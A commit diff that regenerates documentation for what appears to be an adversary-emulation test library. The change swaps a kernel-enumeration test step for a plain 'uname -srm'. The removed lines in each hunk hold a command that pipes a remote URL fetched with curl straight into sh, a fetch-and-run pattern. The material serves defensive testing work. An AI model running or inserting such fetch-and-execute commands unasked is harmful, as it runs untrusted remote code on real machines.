Generated docs from job=generate-docs branch=master [ci skip]
This commit is contained in:
@@ -56605,11 +56605,9 @@ execution:
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|
||||
|sh\nls -la /tmp/art.txt \n"
|
||||
cleanup_command: |
|
||||
rm /tmp/art.txt
|
||||
uname -srm
|
||||
command: 'uname -srm
|
||||
|
||||
'
|
||||
T1559:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
|
||||
@@ -36323,11 +36323,9 @@ execution:
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|
||||
|sh\nls -la /tmp/art.txt \n"
|
||||
cleanup_command: |
|
||||
rm /tmp/art.txt
|
||||
uname -srm
|
||||
command: 'uname -srm
|
||||
|
||||
'
|
||||
T1559:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
|
||||
@@ -690,16 +690,6 @@ An adversary may want to enumerate the kernel information to tailor their attack
|
||||
|
||||
|
||||
```sh
|
||||
cd /tmp
|
||||
curl -s #{remote_url}
|
||||
ls -la /tmp/art.txt
|
||||
curl -s #{remote_url} |sh
|
||||
ls -la /tmp/art.txt
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
rm /tmp/art.txt
|
||||
uname -srm
|
||||
```
|
||||
|
||||
@@ -707,4 +697,5 @@ uname -srm
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
Reference in New Issue
Block a user